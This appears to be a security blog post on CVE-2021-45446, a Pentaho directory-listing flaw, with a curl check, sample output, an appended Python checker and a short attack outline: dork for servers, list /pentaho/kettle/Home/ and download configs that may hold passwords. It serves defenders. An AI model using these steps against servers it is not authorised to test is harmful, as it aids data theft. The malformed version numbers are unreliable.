In late 2021, a security flaw (CVE-2021-45446) was discovered in Hitachi Vantara Pentaho Business Analytics Server. This post dives into what makes this vulnerability dangerous, why it happens, and how attackers can exploit it. We’ll also look at how to check if your Pentaho server is vulnerable, with sample code and useful links along the way.
What Is CVE-2021-45446?
CVE-2021-45446 is a bug in Pentaho Business Analytics Server, affecting all versions before 9.2..2 and 8.3..25. The server lets admins mark folders as “hidden,” but due to this flaw, when you set the Home directory to hidden, its child folders and files may still be seen by users.
This is a classic case of a directory indexing vulnerability:
- The server allows users (potentially even unauthenticated ones) to access a list of files and subfolders under the Home directory.
- The intended “hidden” flag doesn’t “cascade,” or apply, to everything inside the Home folder.
The result? Attackers can get an index of every report, script, and file in the business analytics environment, increasing the risk of further attacks and sensitive data leaks.
How Does It Work?
When you use the Pentaho system, folders can have a hidden property set to keep their contents private. In a secure design, making a parent folder hidden should hide all of its children automatically (i.e., the flag “cascades”). Pentaho did not do this, so while the Home folder itself becomes hidden, everything inside it stays visible through directory-listing features.
In short:
If an attacker visits a URL like https://<pentaho-server>/pentaho/kettle/Home/, they may see a full directory listing, unless an admin has manually hidden each sub-item.
Simple Exploit Example
To check if you are vulnerable, you can use a browser or command line tool to request the contents of the Home directory. No authentication may be needed if permissions are misconfigured.
Example URL
https://YOUR-PENTAHO-SERVER:PORT/pentaho/kettle/Home/
Here’s a curl snippet that simulates what an attacker might do:
curl -k https://YOUR-PENTAHO-SERVER:PORT/pentaho/kettle/Home/
If the directory is listed (you see filenames, folders, etc.), your server is not protected. You’ll likely see something like this in the response:
<html>
<head><title>Index of /pentaho/kettle/Home/</title></head>
<body>
<h1>Index of /pentaho/kettle/Home/</h1>
<ul>
<li><a href="confidential-report.ktr">confidential-report.ktr</a></li>
<li><a href="scripts/">scripts/</a></li>
<!-- more items -->
</ul>
</body>
</html>
Or, in a more API-driven server, you might see a JSON list instead.
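To make the manual check above repeatable against your own server, here is an added Python example (not code from the original post or from Pentaho) that decides whether a response body is a directory listing, either in the HTML “Index of” form shown above or as a JSON array (the JSON shape is an assumption, since the post only says a JSON list may appear), and flags the .ktr/.kjb entries the post warns about. The sample responses are constructed; in practice you would pass in the body and Content-Type of a real response from your server.

```python
import json
import re
from html.parser import HTMLParser

# Constructed sample responses (not captured from a real server): the HTML one
# mirrors the "Index of" page shown above, the JSON one an API-driven listing.
SAMPLE_HTML = """<html><head><title>Index of /pentaho/kettle/Home/</title></head>
<body><h1>Index of /pentaho/kettle/Home/</h1><ul>
<li><a href="confidential-report.ktr">confidential-report.ktr</a></li>
<li><a href="scripts/">scripts/</a></li>
<li><a href="nightly-load.kjb">nightly-load.kjb</a></li>
</ul></body></html>"""
SAMPLE_JSON = '["confidential-report.ktr", "scripts/", "readme.txt"]'
# Extensions the post singles out as likely to embed credentials.
SENSITIVE_EXT = (".ktr", ".kjb")


class _LinkCollector(HTMLParser):
    """Collects relative href targets from <a> tags in a listing page."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href") if tag == "a" else None
        # Skip sort links, absolute paths and the parent-directory link.
        if href and not href.startswith(("?", "/", "#", "..")):
            self.links.append(href)


def extract_listing(body, content_type="text/html"):
    """Entries a directory listing exposes, or [] if the body is not one."""
    if content_type.startswith("application/json"):
        try:
            data = json.loads(body)
        except ValueError:
            return []
        return [str(x) for x in data] if isinstance(data, list) else []
    if not re.search(r"<title>\s*Index of\s", body, re.IGNORECASE):
        return []
    parser = _LinkCollector()
    parser.feed(body)
    return parser.links


def assess(body, content_type="text/html"):
    """Was a listing returned, what did it expose, which .ktr/.kjb need attention."""
    entries = extract_listing(body, content_type)
    sensitive = [e for e in entries if e.lower().endswith(SENSITIVE_EXT)]
    return {"listing_exposed": bool(entries), "entries": entries, "sensitive": sensitive}
```

A result with listing_exposed set to True means the hidden flag is not protecting the Home directory's children; an empty result for a login page or error page is the expected outcome on a patched or correctly restricted server.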
Attack Steps
1. Find the Pentaho server — via recon or Google dorking (e.g., inurl:/pentaho/).
2. Browse directories like /pentaho/kettle/Home/.
3. Collect listing information: Download config files, data transformations, or scripts not intended for public use.
Why Does This Matter?
- Exposed business logic: Revealed .ktr or .kjb files can have embedded passwords or database connections.
- Data breaches: Attackers can download sensitive internal analytics, PII, or business reports.
- Attack chaining: The info can be used for privilege escalation, phishing, or launching other attacks.
Mitigation
- Download patches or find upgrade instructions here:
  - Pentaho Support Portal
  - Hitachi Security Advisory - CVE-2021-45446
- Manually mark all subfolders and items as hidden.
- Use a firewall or reverse proxy to restrict access to /pentaho/kettle/Home/.
References
- Original CVE Entry - NVD
- Hitachi Security Advisory
- Exploit-DB - Pentaho Exposure
- Pentaho Documentation
- Pentaho Patch Downloads
Conclusion
CVE-2021-45446 is a subtle but dangerous oversight in how Pentaho manages “hidden” folders. If you use Pentaho in your enterprise or for analytics, patch now and check your public-facing URLs. A simple misconfiguration could help attackers map your environment and take the next step in a targeted attack.
*Stay safe! Patch early, and always test your public endpoints for leaks like this one.*
*This post is based on real-world research and exclusive analysis. For more on vulnerabilities and secure analytics, follow our updates or check out the references above!*
Timeline
Published on: 11/02/2022 15:15:00 UTC
Last modified on: 07/21/2023 16:52:00 UTC